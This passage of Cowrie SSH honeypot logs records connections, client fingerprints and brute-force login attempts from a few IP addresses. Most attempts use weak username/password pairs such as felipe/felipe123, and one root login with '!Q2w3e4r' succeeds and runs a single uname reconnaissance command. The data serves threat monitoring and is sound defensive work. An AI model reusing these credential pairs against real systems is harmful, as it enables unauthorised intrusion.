cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T21:54:47.539359Z","src_ip":"212.227.235.229","session":"e30cfa7736e7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:47.540907Z","src_ip":"212.227.235.229","session":"e30cfa7736e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56924,"dst_ip":"1.2.3.4","dst_port":22,"session":"543600af9b54","protocol":"ssh","message":"New connection: 212.227.125.160:56924 (1.2.3.4:22) [session: 543600af9b54]","sensor":"my-vps","timestamp":"2025-08-26T21:54:47.612450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:47.614002Z","src_ip":"212.227.125.160","session":"543600af9b54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:47.657683Z","src_ip":"212.227.125.160","session":"543600af9b54"}
{"eventid":"cowrie.login.failed","username":"jyvtc","password":"jyvtc","message":"login attempt [jyvtc/jyvtc] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:48.157411Z","src_ip":"212.227.125.160","session":"543600af9b54"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:49.462313Z","src_ip":"212.227.125.160","session":"543600af9b54"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:49.822101Z","src_ip":"212.227.235.229","session":"b9a1cc4078bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52310,"dst_ip":"1.2.3.4","dst_port":22,"session":"aed0b34b258e","protocol":"ssh","message":"New connection: 212.227.125.160:52310 (1.2.3.4:22) [session: aed0b34b258e]","sensor":"my-vps","timestamp":"2025-08-26T21:54:53.503900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:53.508547Z","src_ip":"212.227.125.160","session":"aed0b34b258e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:53.551021Z","src_ip":"212.227.125.160","session":"aed0b34b258e"}
{"eventid":"cowrie.login.failed","username":"irc","password":"irc","message":"login attempt [irc/irc] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:53.737409Z","src_ip":"212.227.125.160","session":"aed0b34b258e"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":58302,"dst_ip":"1.2.3.4","dst_port":22,"session":"05d8e3cac5e2","protocol":"ssh","message":"New connection: 93.123.109.189:58302 (1.2.3.4:22) [session: 05d8e3cac5e2]","sensor":"my-vps","timestamp":"2025-08-26T21:54:54.560644Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:54.583092Z","src_ip":"93.123.109.189","session":"05d8e3cac5e2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:54.782857Z","src_ip":"212.227.125.160","session":"aed0b34b258e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47698,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d00bea20d90","protocol":"ssh","message":"New connection: 212.227.125.160:47698 (1.2.3.4:22) [session: 6d00bea20d90]","sensor":"my-vps","timestamp":"2025-08-26T21:54:58.990157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:58.991078Z","src_ip":"212.227.125.160","session":"6d00bea20d90"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:59.047004Z","src_ip":"212.227.125.160","session":"6d00bea20d90"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:59.269392Z","src_ip":"212.227.125.160","session":"6d00bea20d90"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:00.635818Z","src_ip":"212.227.125.160","session":"6d00bea20d90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62070,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7e896652dd5","protocol":"ssh","message":"New connection: 212.227.125.160:62070 (1.2.3.4:22) [session: d7e896652dd5]","sensor":"my-vps","timestamp":"2025-08-26T21:55:03.820714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:55:03.821545Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:55:03.907040Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe","message":"login attempt [felipe/felipe] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:04.342397Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe1","message":"login attempt [felipe/felipe1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:05.431117Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43084,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0a482f05d57","protocol":"ssh","message":"New connection: 212.227.125.160:43084 (1.2.3.4:22) [session: f0a482f05d57]","sensor":"my-vps","timestamp":"2025-08-26T21:55:05.540777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:05.564860Z","src_ip":"212.227.125.160","session":"f0a482f05d57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:05.614350Z","src_ip":"212.227.125.160","session":"f0a482f05d57"}
{"eventid":"cowrie.login.failed","username":"splunk","password":"splunk","message":"login attempt [splunk/splunk] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:05.853151Z","src_ip":"212.227.125.160","session":"f0a482f05d57"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe123","message":"login attempt [felipe/felipe123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:06.528039Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:06.933499Z","src_ip":"212.227.125.160","session":"f0a482f05d57"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe1234","message":"login attempt [felipe/felipe1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:07.615873Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe12345","message":"login attempt [felipe/felipe12345] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:08.704975Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:09.791914Z","src_ip":"212.227.125.160","session":"d7e896652dd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38474,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d275c040ba","protocol":"ssh","message":"New connection: 212.227.125.160:38474 (1.2.3.4:22) [session: c2d275c040ba]","sensor":"my-vps","timestamp":"2025-08-26T21:55:12.523152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:12.524590Z","src_ip":"212.227.125.160","session":"c2d275c040ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:12.572204Z","src_ip":"212.227.125.160","session":"c2d275c040ba"}
{"eventid":"cowrie.login.failed","username":"cloud","password":"cloud","message":"login attempt [cloud/cloud] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:13.452641Z","src_ip":"212.227.125.160","session":"c2d275c040ba"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:14.514113Z","src_ip":"212.227.125.160","session":"c2d275c040ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33858,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebbe16762c48","protocol":"ssh","message":"New connection: 212.227.125.160:33858 (1.2.3.4:22) [session: ebbe16762c48]","sensor":"my-vps","timestamp":"2025-08-26T21:55:17.283360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:17.284178Z","src_ip":"212.227.125.160","session":"ebbe16762c48"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:17.334527Z","src_ip":"212.227.125.160","session":"ebbe16762c48"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:55:17.492584Z","src_ip":"212.227.125.160","session":"ebbe16762c48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:55:17.619087Z","src_ip":"212.227.125.160","session":"ebbe16762c48"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:55:17.619890Z","src_ip":"212.227.125.160","session":"ebbe16762c48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:17.692877Z","src_ip":"212.227.125.160","session":"ebbe16762c48"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:17.693973Z","src_ip":"212.227.125.160","session":"ebbe16762c48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57480,"dst_ip":"1.2.3.4","dst_port":22,"session":"964ec29e9498","protocol":"ssh","message":"New connection: 212.227.125.160:57480 (1.2.3.4:22) [session: 964ec29e9498]","sensor":"my-vps","timestamp":"2025-08-26T21:55:22.897454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:22.898418Z","src_ip":"212.227.125.160","session":"964ec29e9498"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:22.961795Z","src_ip":"212.227.125.160","session":"964ec29e9498"}
{"eventid":"cowrie.login.failed","username":"argebarikat","password":"argebarikat","message":"login attempt [argebarikat/argebarikat] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:23.113859Z","src_ip":"212.227.125.160","session":"964ec29e9498"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:24.174523Z","src_ip":"212.227.125.160","session":"964ec29e9498"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52860,"dst_ip":"1.2.3.4","dst_port":22,"session":"420fa2505e6f","protocol":"ssh","message":"New connection: 212.227.125.160:52860 (1.2.3.4:22) [session: 420fa2505e6f]","sensor":"my-vps","timestamp":"2025-08-26T21:55:28.265930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:28.280517Z","src_ip":"212.227.125.160","session":"420fa2505e6f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:28.328511Z","src_ip":"212.227.125.160","session":"420fa2505e6f"}
